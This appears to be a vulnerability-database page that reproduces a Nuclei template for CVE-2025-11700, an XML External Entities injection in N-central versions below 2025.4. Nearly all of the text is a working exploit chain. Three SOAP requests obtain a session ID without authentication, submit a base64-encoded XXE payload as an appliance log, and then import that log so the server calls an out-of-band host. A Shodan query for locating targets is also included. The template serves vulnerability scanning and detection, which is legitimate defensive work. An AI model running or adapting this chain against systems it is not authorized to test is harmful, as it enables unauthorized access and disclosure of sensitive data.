漏洞描述
N-central versions < 2025.4 are vulnerable to an XML External Entities injection leading to information disclosure.
CVE-2025-11700: N-central - XML External Entities Injection
PoC代码[已公开]
id: CVE-2025-11700
info:
name: N-central - XML External Entities Injection
author: DhiyaneshDK,horizon3ai
severity: high
description: |
N-central versions < 2025.4 are vulnerable to an XML External Entities injection leading to information disclosure.
impact: |
Attackers can disclose sensitive information by exploiting XML External Entities injection.
remediation: |
Update to version 2025.4 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-11700
- https://github.com/horizon3ai/n-able_n-central_xxe_file_read/blob/main/ncentral_xxe_file_read.py
metadata:
verified: true
max-request: 3
shodan-query: http.title:"N-central Login"
tags: cve,cve2025,n-central,xxe,oast,oob
flow: http(1) && http(2) && http(3)
variables:
rand: "{{to_lower(rand_text_alpha(10))}}"
xxe_payload: |-
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE servicetemplate [
<!ENTITY % xxe SYSTEM "http://{{interactsh-url}}">
%xxe;
]>
<servicetemplate syntaxversion="2.1.0.0">
<name>{{rand}}</name>
</servicetemplate>
http:
- raw:
- |
POST /dms/services/ServerUI HTTP/2
Host: {{Hostname}}
Content-Type: text/xml
Soapaction: ""
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<sessionHello>
<applianceID>3</applianceID>
</sessionHello>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- SessionID
- sessionHelloResponse
condition: and
internal: true
- type: status
status:
- 200
internal: true
extractors:
- type: regex
part: body
name: sessionid
group: 1
regex:
- '<SessionID[^>]*>(\d+)</SessionID>'
- '<sessionId>(\d+)</sessionId>'
- '<sessionID>(\d+)</sessionID>'
internal: true
- raw:
- |
POST /dms/services/ServerMMS HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header/>
<soapenv:Body>
<ns1:applianceLogSubmit xmlns:ns1="http://www.n-able.com/mickey">
<sessionID>{{sessionid}}</sessionID>
<logType>NETWORK_CHECK_LOG</logType>
<contents>{{base64(xxe_payload)}}</contents>
</ns1:applianceLogSubmit>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- Ok
- Msg
condition: and
internal: true
- raw:
- |
POST /dms/services/ServerUI HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header/>
<soapenv:Body>
<ns1:importServiceTemplateFromFile xmlns:ns1="http://www.n-able.com/mickey">
<ns1:sessionId>{{sessionid}}</ns1:sessionId>
<ns1:customerId>1</ns1:customerId>
<ns1:filePath>/opt/nable/webapps/ROOT/applianceLog/network_check_log_3.log</ns1:filePath>
</ns1:importServiceTemplateFromFile>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
part: interactsh_protocol
words:
- dns
# digest: 4b0a00483046022100d620080a708f8e37b990b6bfcde7c2aced4e4172a2ed06f425d83d03d3cf99f0022100e48be2ff752699a5600a752d93c4212365e3abad4807a6051b9541c5ab806701:922c64590222798bb761d5b6d8e72950